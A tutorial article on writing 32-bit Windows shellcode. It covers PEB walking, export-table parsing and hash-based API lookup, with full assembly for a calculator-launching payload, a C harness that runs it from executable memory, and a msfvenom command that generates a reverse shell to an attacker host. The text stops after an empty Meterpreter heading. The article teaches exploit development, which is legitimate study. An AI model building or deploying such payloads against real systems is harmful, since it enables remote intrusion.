Writing Shellcode for Windows
Thilan Dissanayaka Exploit Development April 22, 2020

In the Linux shellcode article, we wrote shellcode that called the kernel directly: load registers, trigger int 0x80, done. The kernel’s syscall interface is stable, documented, and numbered. On 32-bit x86, syscall 11 is always execve and syscall 1 is always exit.

Windows doesn’t work that way.

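Windows syscall numbers change between versions, even between service packs. The same system call (NtCreateFile, for example) can have one number on Windows 7 and a different one on Windows 10, and 32-bit and 64-bit builds use different numbering. Microsoft considers the syscall interface private and undocumented. You’re supposed to go through the documented Win32 API exported by DLLs such as kernel32.dll and user32.dll, which in turn call the native API in ntdll.dll.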

This means Windows shellcode must:

  1. Find where kernel32.dll is loaded in memory: at runtime, without hardcoding addresses
  2. Parse kernel32.dll’s export table: walk the PE structure to find function addresses
  3. Resolve the API functions it needs: WinExec, LoadLibraryA, GetProcAddress, etc.
  4. Call those functions: finally do something useful

This is significantly more complex than Linux shellcode. But it’s also more elegant — once you understand PEB walking and export parsing, you can call any Windows API function from position-independent shellcode.

The Architecture — Why PEB Walking?

When a Windows process starts, the OS loads several DLLs into its address space. The most important for shellcode:

DLL          | Why We Need It
kernel32.dll | Contains WinExec, LoadLibraryA, GetProcAddress, ExitProcess
ntdll.dll    | Low-level NT functions, always loaded first
ws2_32.dll   | WinSock, needed for reverse shells (not loaded by default)

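The problem: ASLR randomizes where these DLLs load. We can’t hardcode an address such as WinExec = 0x7C8623AD: since Windows Vista, system DLLs are rebased at every boot, and even without ASLR the address differs between Windows versions and patch levels.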

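The solution: every Windows process has a Process Environment Block (PEB), a data structure that contains, among other things, a linked list of all loaded modules (DLLs) and their base addresses. The PEB is always reachable from a fixed starting point: the FS segment register (GS on 64-bit) points at the current thread’s Thread Environment Block (TEB), and the TEB holds a pointer to the PEB.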

TEB (Thread Environment Block, at fs:[0])
  ↓ offset 0x30
PEB (Process Environment Block)
  ↓ offset 0x0C
PEB_LDR_DATA
  ↓ offset 0x14
InMemoryOrderModuleList (doubly-linked list)
  → the .exe itself
  → ntdll.dll
  → kernel32.dll
  → ...other loaded DLLs (kernelbase.dll on Windows 7+, user32.dll, ...)

From any thread, at any time, regardless of ASLR:

mov eax, fs:[0x30]    ; EAX = PEB address (always works, 32-bit)
; On 64-bit: mov rax, gs:[0x60]

That’s the entry point. From the PEB, we walk the module list to find kernel32.dll’s base address. From kernel32.dll’s base, we parse the PE export table to find function addresses.

Step 1: Finding kernel32.dll via PEB

The PEB Structure (Relevant Fields)

PEB (at fs:[0x30]):
  +0x00  InheritedAddressSpace
  +0x08  ImageBaseAddress
  +0x0C  Ldr  →  PEB_LDR_DATA
         ...

PEB_LDR_DATA:
  +0x0C  InLoadOrderModuleList
  +0x14  InMemoryOrderModuleList  ← We use this one
  +0x1C  InInitializationOrderModuleList

Each list entry (32-bit LDR_DATA_TABLE_ENTRY; offsets are relative to InMemoryOrderLinks, which is where the list pointers point):
  +0x00  InMemoryOrderLinks.Flink  (next entry)
  +0x04  InMemoryOrderLinks.Blink  (previous entry)
  +0x08  InInitializationOrderLinks
  +0x10  DllBase                   ← The DLL's base address in memory
  +0x14  EntryPoint
  +0x18  SizeOfImage
  +0x1C  FullDllName (UNICODE_STRING)
  +0x24  BaseDllName (UNICODE_STRING; its Buffer pointer is at +0x28)
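To double-check these 32-bit offsets without a Windows box, the structures can be modeled with Python's ctypes. This is a sketch, assuming the 32-bit layouts shown by WinDbg's `dt ntdll!_LDR_DATA_TABLE_ENTRY`; the class names ending in 32 are hypothetical, every pointer is modeled as `c_uint32` so the result does not depend on the host's pointer size, and only the leading fields of the entry are included.

```python
import ctypes

# Hypothetical 32-bit models: pointers are c_uint32 so offsets match a 32-bit process.
class LIST_ENTRY32(ctypes.Structure):
    _fields_ = [("Flink", ctypes.c_uint32), ("Blink", ctypes.c_uint32)]

class UNICODE_STRING32(ctypes.Structure):
    _fields_ = [("Length", ctypes.c_uint16),         # in bytes, without terminator
                ("MaximumLength", ctypes.c_uint16),
                ("Buffer", ctypes.c_uint32)]         # 32-bit pointer to UTF-16 text

class PEB_LDR_DATA32(ctypes.Structure):
    _fields_ = [("Length", ctypes.c_uint32),
                ("Initialized", ctypes.c_uint8),     # ctypes pads this to 4 bytes, as C does
                ("SsHandle", ctypes.c_uint32),
                ("InLoadOrderModuleList", LIST_ENTRY32),
                ("InMemoryOrderModuleList", LIST_ENTRY32),
                ("InInitializationOrderModuleList", LIST_ENTRY32)]

class LDR_DATA_TABLE_ENTRY32(ctypes.Structure):
    # Only the leading fields are modeled; the real structure continues past BaseDllName.
    _fields_ = [("InLoadOrderLinks", LIST_ENTRY32),
                ("InMemoryOrderLinks", LIST_ENTRY32),
                ("InInitializationOrderLinks", LIST_ENTRY32),
                ("DllBase", ctypes.c_uint32),
                ("EntryPoint", ctypes.c_uint32),
                ("SizeOfImage", ctypes.c_uint32),
                ("FullDllName", UNICODE_STRING32),
                ("BaseDllName", UNICODE_STRING32)]

def rel_to_memory_links(field):
    """Offset of `field` relative to InMemoryOrderLinks, where the list pointers land."""
    links = LDR_DATA_TABLE_ENTRY32.InMemoryOrderLinks.offset
    return getattr(LDR_DATA_TABLE_ENTRY32, field).offset - links

print(f"InMemoryOrderModuleList +0x{PEB_LDR_DATA32.InMemoryOrderModuleList.offset:02X}")
for name in ("DllBase", "EntryPoint", "SizeOfImage", "FullDllName", "BaseDllName"):
    print(f"{name:12} +0x{rel_to_memory_links(name):02X}")
```

The subtraction matters: the list pointers point at InMemoryOrderLinks, which sits 8 bytes into the real structure, so every field appears 8 bytes earlier than its absolute offset.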

The InMemoryOrderModuleList is a doubly-linked list of all loaded modules. The order is:

  1. The executable itself (e.g., vulnerable.exe)
  2. ntdll.dll
  3. kernel32.dll (on Windows 7 and later, usually followed by kernelbase.dll)

So to find kernel32.dll, we follow the list: skip the first entry (the exe), skip the second (ntdll), and the third is kernel32.

Assembly: Walking the PEB

; Find kernel32.dll base address
; 32-bit Windows

    xor ecx, ecx
    mov eax, [fs:ecx+0x30]     ; EAX = PEB (NASM syntax; the ECX=0 base avoids the nulls of a 32-bit address)
    mov eax, [eax+0x0C]        ; EAX = PEB->Ldr (PEB_LDR_DATA)
    mov esi, [eax+0x14]        ; ESI = InMemoryOrderModuleList.Flink (first entry)
    lodsd                       ; EAX = second entry (ntdll.dll)
    xchg eax, esi              ; ESI = second entry
    lodsd                       ; EAX = third entry (kernel32.dll)
    mov ebx, [eax+0x10]        ; EBX = kernel32.dll base address!

Let’s trace this:

  1. fs:[0x30] gives us the PEB
  2. PEB+0x0C gives us PEB_LDR_DATA
  3. PEB_LDR_DATA+0x14 gives us the first entry in InMemoryOrderModuleList (the .exe)
  4. First lodsd (loads dword at ESI into EAX, advances ESI) moves to the second entry (ntdll.dll)
  5. Second lodsd moves to the third entry (kernel32.dll)
  6. Entry+0x10 gives us the DllBase — kernel32.dll’s base address

EBX now contains kernel32.dll’s base address. This works regardless of ASLR.
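The pointer chasing can be replayed outside Windows. The sketch below builds a fake 32-bit address space (the `FakeMemory`, `build_process` and `third_module_base` names and every address are hypothetical) containing a PEB_LDR_DATA list head and three entries, then performs exactly the same reads as the assembly. It does not model lodsd's ESI increment, because the code never relies on it.

```python
import struct

class FakeMemory:
    """Hypothetical sparse 32-bit address space: absolute address -> byte."""
    def __init__(self):
        self.mem = {}

    def write_dword(self, addr, value):
        for i, b in enumerate(struct.pack("<I", value)):
            self.mem[addr + i] = b

    def read_dword(self, addr):
        return struct.unpack("<I", bytes(self.mem[addr + i] for i in range(4)))[0]

def build_process(mem, bases, ldr=0x1000, first_entry=0x2000, stride=0x100):
    """Lay out the InMemoryOrderModuleList head and one entry per DllBase.
    All addresses are made up; only the +0x14 and +0x10 offsets mirror Windows."""
    head = ldr + 0x14                                    # list head inside PEB_LDR_DATA
    entries = [first_entry + i * stride for i in range(len(bases))]
    nodes = [head] + entries                             # circular: last entry links back to head
    for i, node in enumerate(nodes):
        mem.write_dword(node, nodes[(i + 1) % len(nodes)])   # Flink
        mem.write_dword(node + 4, nodes[i - 1])               # Blink
    for entry, base in zip(entries, bases):
        mem.write_dword(entry + 0x10, base)                   # DllBase
    return ldr

def third_module_base(mem, ldr):
    """Same reads as the assembly, one line per instruction."""
    esi = mem.read_dword(ldr + 0x14)    # mov esi, [eax+0x14] -> first entry (the .exe)
    eax = mem.read_dword(esi)           # lodsd               -> second entry (ntdll.dll)
    esi = eax                           # xchg eax, esi
    eax = mem.read_dword(esi)           # lodsd               -> third entry (kernel32.dll)
    return mem.read_dword(eax + 0x10)   # mov ebx, [eax+0x10] -> DllBase

mem = FakeMemory()
ldr = build_process(mem, [0x00400000, 0x77A00000, 0x76B00000])  # exe, ntdll, kernel32 (made up)
print(hex(third_module_base(mem, ldr)))   # 0x76b00000
```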

Note on Modern Windows

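On Windows 7 and later, kernel32.dll forwards much of its work to kernelbase.dll, which is loaded alongside it. Because kernelbase.dll is initialized first, it appears ahead of kernel32.dll in InInitializationOrderModuleList, which broke older shellcode that took a fixed entry from that list. In InMemoryOrderModuleList the third entry is normally still kernel32.dll, but Windows does not document or guarantee the order. For maximum compatibility, some shellcode walks the list and compares each entry’s BaseDllName, but for simplicity, the third-entry assumption works in most cases.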
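The name-based walk can be sketched the same way. Assumptions: a toy address space held in a bytearray, made-up addresses and bases, and a hypothetical module order in which KERNELBASE.dll sits third, so the positional trick would pick the wrong DLL while the name comparison still finds kernel32.dll. The helper names are hypothetical; the offsets (+0x10 DllBase, +0x24 BaseDllName.Length, +0x28 BaseDllName.Buffer) are the 32-bit ones from the structure listing.

```python
import struct

MEM = bytearray(0x4000)   # toy 32-bit address space; an address is an index into MEM

def write_dword(addr, value):
    struct.pack_into("<I", MEM, addr, value)

def read_dword(addr):
    return struct.unpack_from("<I", MEM, addr)[0]

def read_word(addr):
    return struct.unpack_from("<H", MEM, addr)[0]

def add_modules(ldr, modules, first=0x1000, stride=0x100):
    """Hypothetical helper: build a circular InMemoryOrderModuleList from (name, base) pairs."""
    head = ldr + 0x14
    entries = [first + i * stride for i in range(len(modules))]
    nodes = [head] + entries
    for i, node in enumerate(nodes):
        write_dword(node, nodes[(i + 1) % len(nodes)])   # Flink
        write_dword(node + 4, nodes[i - 1])              # Blink
    for entry, (name, base) in zip(entries, modules):
        raw = name.encode("utf-16-le")
        buf = entry + 0x80                               # keep the name inside the entry's slot
        MEM[buf:buf + len(raw)] = raw
        write_dword(entry + 0x10, base)                  # DllBase
        struct.pack_into("<HHI", MEM, entry + 0x24, len(raw), len(raw), buf)  # BaseDllName

def find_module(ldr, wanted):
    """Walk the list comparing BaseDllName case-insensitively; None if absent."""
    head = ldr + 0x14
    entry = read_dword(head)
    while entry != head:                                 # circular list: stop back at the head
        length = read_word(entry + 0x24)                 # BaseDllName.Length (bytes)
        buf = read_dword(entry + 0x28)                   # BaseDllName.Buffer
        if MEM[buf:buf + length].decode("utf-16-le").lower() == wanted.lower():
            return read_dword(entry + 0x10)              # DllBase
        entry = read_dword(entry)                        # follow Flink
    return None

# Hypothetical order: kernelbase third, so "take the third entry" would be wrong here.
add_modules(0x100, [("test.exe", 0x00400000), ("ntdll.dll", 0x77A00000),
                    ("KERNELBASE.dll", 0x75C00000), ("KERNEL32.DLL", 0x76B00000)])
print(hex(find_module(0x100, "kernel32.dll")))   # 0x76b00000
```

The case-insensitive comparison matters because the loader records names with whatever casing the DLL was loaded under (KERNEL32.DLL vs kernel32.dll). Real shellcode usually hashes the name instead of storing the string.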

Step 2: Parsing the PE Export Table

Now that we have kernel32.dll’s base address, we need to find specific functions within it. DLLs are PE (Portable Executable) files, and their exported functions are listed in the Export Directory.

PE Structure (from the base address)

Base Address (EBX):
  +0x3C  e_lfanew → offset to PE signature

PE Signature:
  +0x00  "PE\0\0"
  +0x78  Export Directory RVA (Relative Virtual Address; 32-bit PE32 layout, +0x88 in 64-bit PE32+)

Export Directory:
  +0x18  NumberOfNames
  +0x1C  AddressOfFunctions   (RVA array of function addresses)
  +0x20  AddressOfNames       (RVA array of function name pointers)
  +0x24  AddressOfNameOrdinals (RVA array of ordinal values)

The export resolution process:

  1. Walk the AddressOfNames array — compare each name to the function we’re looking for
  2. When we find a match at index i — read the ordinal from AddressOfNameOrdinals[i]
  3. Use the ordinal to index into AddressOfFunctions — that gives us the function’s RVA
  4. Add the DLL base address to the RVA — that’s the actual function address
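The four steps map almost line for line onto Python. The sketch below assumes `image` is the module as it sits in memory (so an RVA is simply an offset into the buffer) and a 32-bit PE32 layout. `build_image` is a hypothetical helper that fabricates a tiny export table, storing the function RVAs in reverse order so that the ordinal indirection in step 2 actually matters. Forwarded exports (RVAs pointing back inside the export directory) are not handled.

```python
import struct

def u16(buf, off):
    return struct.unpack_from("<H", buf, off)[0]

def u32(buf, off):
    return struct.unpack_from("<I", buf, off)[0]

def resolve_export(image, base, wanted):
    """Return base + RVA of the export named `wanted`, or None if not exported by name."""
    pe = u32(image, 0x3C)                          # e_lfanew
    exp = u32(image, pe + 0x78)                    # Export Directory RVA (PE32 layout)
    n_names = u32(image, exp + 0x18)               # NumberOfNames
    functions = u32(image, exp + 0x1C)             # AddressOfFunctions
    names = u32(image, exp + 0x20)                 # AddressOfNames
    ordinals = u32(image, exp + 0x24)              # AddressOfNameOrdinals
    for i in range(n_names):
        name_rva = u32(image, names + 4 * i)
        end = image.index(b"\0", name_rva)
        if image[name_rva:end] == wanted.encode("ascii"):        # step 1: match name[i]
            index = u16(image, ordinals + 2 * i)                  # step 2: ordinal for i
            return base + u32(image, functions + 4 * index)       # steps 3-4: RVA + base
    return None

def build_image(exports):
    """Hypothetical helper: fabricate a tiny 'mapped' DLL from (name, function RVA) pairs."""
    img = bytearray(0x1000)
    img[0:2] = b"MZ"
    struct.pack_into("<I", img, 0x3C, 0x80)                       # e_lfanew
    img[0x80:0x84] = b"PE\0\0"
    exp, funcs, names, ords, strings = 0x200, 0x300, 0x400, 0x500, 0x600
    struct.pack_into("<I", img, 0x80 + 0x78, exp)                 # Export Directory RVA
    # NumberOfNames, AddressOfFunctions, AddressOfNames, AddressOfNameOrdinals
    struct.pack_into("<IIII", img, exp + 0x18, len(exports), funcs, names, ords)
    n = len(exports)
    for i, (name, rva) in enumerate(exports):
        slot = n - 1 - i                                          # reversed function order
        struct.pack_into("<I", img, funcs + 4 * slot, rva)
        struct.pack_into("<I", img, names + 4 * i, strings)
        struct.pack_into("<H", img, ords + 2 * i, slot)
        raw = name.encode("ascii") + b"\0"
        img[strings:strings + len(raw)] = raw
        strings += len(raw)
    return bytes(img)

image = build_image([("ExitProcess", 0x0A10), ("WinExec", 0x0B20)])
print(hex(resolve_export(image, 0x76B00000, "WinExec")))   # 0x76b00b20
```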

Assembly: Finding a Function by Name

This is the core routine of almost every Windows shellcode. We’ll write a function that takes a DLL base address and a function name hash and returns the function address.

Why Hashing?

Comparing strings byte-by-byte in shellcode is bulky. Instead, we compute a hash of each export name and compare it to a pre-computed hash of the function we want. This saves space significantly.

The most common hash algorithm in shellcode is a simple rotate-and-add:

; Hash function: ROR13 + ADD
; Input: ESI = pointer to ASCII string
; Output: EDX = hash

compute_hash:
    xor eax, eax                ; lodsb only writes AL, so the rest of EAX must start at zero
    xor edx, edx
.hash_loop:
    lodsb                       ; AL = next byte, ESI++
    test al, al
    jz .hash_done
    ror edx, 13                 ; Rotate right by 13
    add edx, eax               ; Add character value
    jmp .hash_loop
.hash_done:
    ret

Pre-compute the hash for WinExec:

def ror13_hash(name):
    h = 0
    for c in name:
        h = ((h >> 13) | (h << 19)) & 0xFFFFFFFF
        h = (h + ord(c)) & 0xFFFFFFFF
    return h

print(f"0x{ror13_hash('WinExec'):08X}")          # 0x0E8AFE98
print(f"0x{ror13_hash('ExitProcess'):08X}")      # 0x73E2D87E
print(f"0x{ror13_hash('LoadLibraryA'):08X}")     # 0xEC0E4E8E
print(f"0x{ror13_hash('GetProcAddress'):08X}")   # 0x7C0DFCAA

Assembly: Complete Export Resolution

; find_function: Resolve a function from a DLL by hash
; Input:  EBX = DLL base address
;         EDX = ROR13 hash of function name to find
; Output: EAX = function address (0 if not found); other registers preserved

find_function:
    pushad                      ; Save all registers (the hash in EDX lands at [esp+0x14])
    mov eax, [ebx+0x3C]        ; e_lfanew (offset to PE header)
    mov ebp, [ebx+eax+0x78]    ; Export Directory RVA
    add ebp, ebx               ; EBP = Export Directory absolute address
    mov ecx, [ebp+0x18]        ; ECX = NumberOfNames
    mov edi, [ebp+0x20]        ; AddressOfNames RVA
    add edi, ebx               ; EDI = AddressOfNames absolute (not EAX: lodsb overwrites AL)
                                ; ([ebp+ecx*4] would need a zero displacement byte, so EBP
                                ;  holds the export directory and EDI the names array)

.find_loop:
    jecxz .find_fail            ; If no more names, fail
    dec ecx                     ; Walk the names from last to first
    mov esi, [edi+ecx*4]       ; ESI = RVA of name[ecx]
    add esi, ebx               ; ESI = absolute address of name string

    ; Compute hash of this export name
    xor eax, eax               ; Upper 24 bits of EAX must be zero for "add edx, eax"
    xor edx, edx
.hash_loop:
    lodsb
    test al, al
    jz short .hash_done
    ror edx, 13
    add edx, eax
    jmp .hash_loop

.hash_done:
    cmp edx, [esp+0x14]        ; Compare with target hash (caller's EDX, saved by pushad)
    jnz .find_loop              ; No match, try next name

    ; Match found! Get the function address
    mov eax, [ebp+0x24]        ; AddressOfNameOrdinals RVA
    add eax, ebx
    movzx ecx, word [eax+ecx*2] ; ECX = ordinal for this name (index into AddressOfFunctions)
    mov eax, [ebp+0x1C]        ; AddressOfFunctions RVA
    add eax, ebx
    mov eax, [eax+ecx*4]       ; EAX = function RVA
    add eax, ebx               ; EAX = function absolute address!

    mov [esp+0x1C], eax        ; Store result (overwrite saved EAX in pushad frame)
    popad
    ret

.find_fail:
    popad
    xor eax, eax
    ret
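The stack offsets in find_function follow from the fixed order in which pushad stores registers: EAX, ECX, EDX, EBX, the original ESP, EBP, ESI, EDI, with EDI ending up at [esp+0]. The short sketch below (`pushad_frame` is a hypothetical helper) computes the frame right after `call` followed by `pushad`. When the hash is passed in EDX, as in the listing, its saved copy sits at [esp+0x14]; [esp+0x24] would hold it only if the caller had pushed it onto the stack before the call. The saved-EAX slot at [esp+0x1C] is what lets popad hand the result back in EAX.

```python
# Registers in the order pushad pushes them ("ESP" is the value from before pushad).
PUSHAD_ORDER = ["EAX", "ECX", "EDX", "EBX", "ESP", "EBP", "ESI", "EDI"]

def pushad_frame():
    """Hypothetical helper: [esp+X] offset of each slot right after `call` then `pushad`."""
    frame = {}
    for i, reg in enumerate(PUSHAD_ORDER):
        # Each push moves ESP down 4 bytes, so the last register pushed (EDI) is at [esp+0].
        frame[reg] = 4 * (len(PUSHAD_ORDER) - 1 - i)
    frame["return address"] = 4 * len(PUSHAD_ORDER)        # pushed by `call` before pushad
    frame["caller's stack"] = frame["return address"] + 4  # first dword above the return address
    return frame

for slot, offset in sorted(pushad_frame().items(), key=lambda kv: kv[1]):
    print(f"[esp+0x{offset:02X}]  {slot}")
```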

Step 3: Putting It All Together — WinExec Shellcode

Now we combine PEB walking + export resolution + the actual payload.

Complete WinExec(“calc.exe”) Shellcode

[BITS 32]

    cld                         ; Clear direction flag (lodsb/lodsd must walk forward)

; ===== FIND KERNEL32.DLL =====
    xor ecx, ecx
    mov eax, [fs:ecx+0x30]     ; PEB
    mov eax, [eax+0x0C]        ; PEB->Ldr
    mov esi, [eax+0x14]        ; InMemoryOrderModuleList.Flink (exe entry)
    lodsd                       ; Skip exe entry → ntdll
    xchg eax, esi
    lodsd                       ; Skip ntdll → kernel32
    mov ebx, [eax+0x10]        ; EBX = kernel32.dll base

    jmp short resolve           ; Hop over find_function so every call to it is a backward call:
                                ; a short forward call encodes its rel32 as xx 00 00 00

; ===== FIND_FUNCTION SUBROUTINE =====
; In: EBX = DLL base, EDX = ROR13 hash.  Out: EAX = address (0 if not found).
find_function:
    pushad
    mov eax, [ebx+0x3C]        ; e_lfanew
    mov ebp, [ebx+eax+0x78]    ; Export Directory RVA
    add ebp, ebx               ; EBP = Export Directory
    mov ecx, [ebp+0x18]        ; ECX = NumberOfNames
    mov edi, [ebp+0x20]
    add edi, ebx               ; EDI = AddressOfNames (not EAX: lodsb overwrites AL)

.find_loop:
    jecxz .find_fail
    dec ecx
    mov esi, [edi+ecx*4]
    add esi, ebx               ; ESI = name string

    xor eax, eax               ; Upper bits of EAX must be zero for "add edx, eax"
    xor edx, edx
.hash_loop:
    lodsb
    test al, al
    jz short .hash_compare
    ror edx, 13
    add edx, eax
    jmp .hash_loop

.hash_compare:
    cmp edx, [esp+0x14]        ; Target hash = caller's EDX, saved by pushad
    jnz .find_loop

    mov eax, [ebp+0x24]
    add eax, ebx               ; EAX = AddressOfNameOrdinals
    movzx ecx, word [eax+ecx*2] ; ECX = index into AddressOfFunctions
    mov eax, [ebp+0x1C]
    add eax, ebx               ; EAX = AddressOfFunctions
    mov eax, [eax+ecx*4]
    add eax, ebx               ; EAX = function address
    mov [esp+0x1C], eax        ; Becomes EAX after popad
    popad
    ret

.find_fail:
    popad
    xor eax, eax
    ret

resolve:
; ===== FIND WinExec =====
    mov edx, 0x0E8AFE98        ; Hash of "WinExec"
    call find_function          ; EAX = WinExec address
    mov edi, eax               ; Save WinExec address in EDI

; ===== FIND ExitProcess =====
    mov edx, 0x73E2D87E        ; Hash of "ExitProcess"
    call find_function          ; EAX = ExitProcess address
    mov esi, eax               ; Save ExitProcess address in ESI

; ===== CALL WinExec("calc.exe", SW_SHOWNORMAL) =====
    xor ecx, ecx
    push ecx                   ; null terminator
    push 0x6578652E            ; ".exe"
    push 0x636C6163            ; "calc"
    mov eax, esp               ; EAX = pointer to "calc.exe\0" on stack

    push 1                     ; uCmdShow = 1 (SW_SHOWNORMAL); 0 (SW_HIDE) would hide the window
    push eax                   ; lpCmdLine = "calc.exe"
    call edi                   ; Call WinExec("calc.exe", 1)

; ===== CALL ExitProcess(0) =====
    xor ecx, ecx
    push ecx                   ; Exit code = 0
    call esi                   ; Call ExitProcess(0)

Compiling and Testing

# Assemble
$ nasm -f bin shellcode.asm -o shellcode.bin

# Count null bytes (should print 0)
$ xxd -p -c 1 shellcode.bin | grep -c '^00$'

# Extract as hex string
$ xxd -p shellcode.bin | tr -d '\n'

# Check size
$ wc -c shellcode.bin
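If xxd is not available (for example on a Windows host), a few lines of Python can do the same two jobs: report null bytes and format the bytes as C string literals for the test harness. This is a sketch; the script name and helper names are hypothetical, and the sample bytes in the check are the first bytes shown in the harness.

```python
import sys

def null_offsets(code):
    """Offsets of every 0x00 byte; for injectable shellcode this should be empty."""
    return [i for i, b in enumerate(code) if b == 0]

def to_c_literal(code, per_line=13):
    """Format raw bytes as C string-literal lines such as "\\xfc\\x31..."."""
    lines = []
    for i in range(0, len(code), per_line):
        chunk = code[i:i + per_line]
        lines.append('"' + "".join(f"\\x{b:02x}" for b in chunk) + '"')
    return "\n".join(lines)

if __name__ == "__main__" and len(sys.argv) > 1:
    with open(sys.argv[1], "rb") as f:
        data = f.read()
    print(f"{len(data)} bytes, null bytes at: {null_offsets(data) or 'none'}")
    print(to_c_literal(data))
```

Usage: `python3 check_shellcode.py shellcode.bin` (hypothetical file name).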

The C Test Harness

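#include <stdio.h>
#include <string.h>
#include <windows.h>

unsigned char shellcode[] =
"\xfc\x31\xc9\x64\x8b\x41\x30\x8b\x40\x0c\x8b\x70\x14"
"\xad\x96\xad\x8b\x58\x10..."  // (full shellcode bytes here)
;

int main(void) {
    // sizeof includes the string literal's implicit terminator, hence the -1
    printf("Shellcode length: %d\n", (int)(sizeof(shellcode) - 1));

    // Allocate memory that is readable, writable and executable
    void *exec = VirtualAlloc(NULL, sizeof(shellcode),
                              MEM_COMMIT | MEM_RESERVE,
                              PAGE_EXECUTE_READWRITE);
    if (exec == NULL) {
        printf("VirtualAlloc failed: %lu\n", GetLastError());
        return 1;
    }

    memcpy(exec, shellcode, sizeof(shellcode));

    // Execute (the payload ends in ExitProcess, so this call does not return)
    ((void (*)(void))exec)();

    return 0;
}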

Compile with a 32-bit MinGW GCC (the shellcode is x86 code, so the harness must run as a 32-bit process):

> gcc -o test test.c -m32
> test.exe

Calculator should pop up.

Avoiding Null Bytes

Just like Linux shellcode, null bytes (\x00) terminate C strings and break many exploit delivery mechanisms. Common null byte sources and fixes:

Problem             | Contains Null                     | Fix
mov eax, 0          | \xB8\x00\x00\x00\x00              | xor eax, eax
push 0              | \x6A\x00                          | xor ecx, ecx; push ecx
mov eax, 0x0E8AFE98 | Possibly, depending on the value  | Check every constant; this one encodes as \xB8\x98\xFE\x8A\x0E, so it is fine
String “calc.exe\0” | The null terminator               | Push the null via xor ecx, ecx; push ecx before pushing the string
push 0x00636C61     | The high byte is \x00             | mov eax, 0xFF636C61; shl eax, 8; shr eax, 8; push eax (or XOR-encode the value)
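Whether an immediate is null-free can be checked mechanically: encode it little-endian, exactly as it appears inside the instruction, and look for 0x00. This is a sketch; `imm32_bytes`, `has_null` and `shl_shr_fixup` are hypothetical helpers, and the fixup only covers a value whose top byte alone is zero, as in the push 0x00636C61 row.

```python
import struct

def imm32_bytes(value):
    """The 4 bytes of a 32-bit immediate as stored in the instruction (little-endian)."""
    return struct.pack("<I", value & 0xFFFFFFFF)

def has_null(value):
    return 0 in imm32_bytes(value)

def shl_shr_fixup(value):
    """Null-free stand-in for a value whose top byte (only) is 0x00, plus NASM lines
    that rebuild it at runtime: shl then shr by 8 clears the top byte again."""
    stand_in = value | 0xFF000000
    if has_null(stand_in):
        raise ValueError("more than the top byte is zero; needs a different fix")
    return stand_in, [f"mov eax, 0x{stand_in:08X}", "shl eax, 8", "shr eax, 8", "push eax"]

for v in (0x0E8AFE98, 0x73E2D87E, 0x00636C61):
    print(f"0x{v:08X} -> {imm32_bytes(v).hex(' ')} {'NULL' if has_null(v) else 'ok'}")

stand_in, asm = shl_shr_fixup(0x00636C61)
print("\n".join(asm))
```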

The string pushing technique:

; Push "calc.exe\0" onto the stack (no null bytes in the code)
xor ecx, ecx
push ecx                   ; Push null terminator (\0)

; "calc.exe" = 63 61 6C 63 2E 65 78 65
; In little-endian dwords:
push 0x6578652E            ; ".exe" (stored in memory as 2E 65 78 65)
push 0x636C6163            ; "calc" (stored in memory as 63 61 6C 63)

mov eax, esp               ; EAX points to "calc.exe\0"

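Each push stores its 4-byte immediate in little-endian order, so the first character of each chunk ends up in the lowest byte. Because the stack grows downward, the chunks are pushed in reverse: the null terminator first (via push ecx where ECX=0), then ".exe", then "calc", which leaves ESP pointing at the start of the string.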
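The reversal can be automated. This hypothetical `push_string` helper is a sketch that only accepts strings whose length is a multiple of 4, so the terminator can always come from push ecx; other lengths would need padding or a runtime fixup. For "calc.exe" it reproduces the sequence above.

```python
def push_string(s):
    """Hypothetical helper: NASM lines that build the null-terminated string `s`
    on the stack and leave EAX pointing at it. len(s) must be a multiple of 4."""
    raw = s.encode("ascii")
    if len(raw) % 4:
        raise ValueError("pad the string to a multiple of 4 bytes first")
    lines = ["xor ecx, ecx", "push ecx                   ; null terminator"]
    # The stack grows down, so the last 4-byte chunk is pushed first.
    for i in range(len(raw) - 4, -1, -4):
        chunk = raw[i:i + 4]
        value = int.from_bytes(chunk, "little")   # first character ends up in the lowest byte
        lines.append(f"push 0x{value:08X}            ; {chunk.decode('ascii')!r}")
    lines.append("mov eax, esp               ; EAX -> string")
    return lines

print("\n".join(push_string("calc.exe")))
```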

Reverse Shell Shellcode

A calculator pop is a proof of concept. For real exploitation, we need a reverse shell. This requires loading ws2_32.dll (WinSock), which isn’t loaded by default.

The Strategy

  1. Find kernel32.dll → resolve LoadLibraryA and GetProcAddress
  2. Call LoadLibraryA("ws2_32.dll") → load WinSock
  3. Use GetProcAddress to find: WSAStartup, WSASocketA, connect
  4. Initialize WinSock, create a socket, connect to the attacker
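  5. Redirect stdin/stdout/stderr to the socket (pass the socket as hStdInput, hStdOutput and hStdError in a STARTUPINFOA structure with STARTF_USESTDHANDLES set)
  6. Spawn cmd.exe

Shellcode flow: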
PEB → kernel32.dll base
  → LoadLibraryA("ws2_32.dll") → ws2_32.dll base
  → WSAStartup(0x0202, &wsadata)
  → WSASocketA(AF_INET, SOCK_STREAM, 0, 0, 0, 0)
  → connect(sock, {AF_INET, port, IP}, 16)
  → CreateProcessA("cmd.exe", ..., stdin=sock, stdout=sock, stderr=sock)
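The connect() step needs a 16-byte sockaddr_in. The sketch below shows how its bytes are laid out, assuming the example address and port used in the msfvenom commands in this section (192.168.1.100, 4444): sin_family is a little-endian 16-bit value on x86, sin_port is in network (big-endian) byte order, then come the IPv4 address and 8 zero bytes. Split into the two dwords a hand-written payload would push, the family/port dword contains a null byte, so it needs one of the null-avoidance tricks from earlier. The helper name is hypothetical.

```python
import socket
import struct

AF_INET = 2  # same value in Winsock and BSD sockets

def sockaddr_in(ip, port):
    """Hypothetical helper: 16-byte struct sockaddr_in as passed to connect()."""
    return (struct.pack("<H", AF_INET)      # sin_family: host (little-endian) order on x86
            + struct.pack(">H", port)       # sin_port: network (big-endian) order
            + socket.inet_aton(ip)          # sin_addr: 4 bytes, already network order
            + bytes(8))                     # sin_zero

addr = sockaddr_in("192.168.1.100", 4444)
family_port, ip_dword = struct.unpack("<II", addr[:8])
print(len(addr), hex(family_port), hex(ip_dword))   # 16 0x5c110002 0x6401a8c0
print("null byte in family/port dword:", 0 in struct.pack("<I", family_port))  # True
```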

This is substantially more complex than Linux reverse shell shellcode (which is ~70 bytes using raw syscalls). Windows reverse shell shellcode is typically 300-500 bytes due to the PEB walking, export resolution, and WinSock setup overhead.

In practice, most exploit developers use msfvenom to generate Windows shellcode:

# Windows reverse shell shellcode
$ msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.100 LPORT=4444 \
    -f c -a x86 --platform windows -b "\x00"

# Windows Meterpreter (staged)
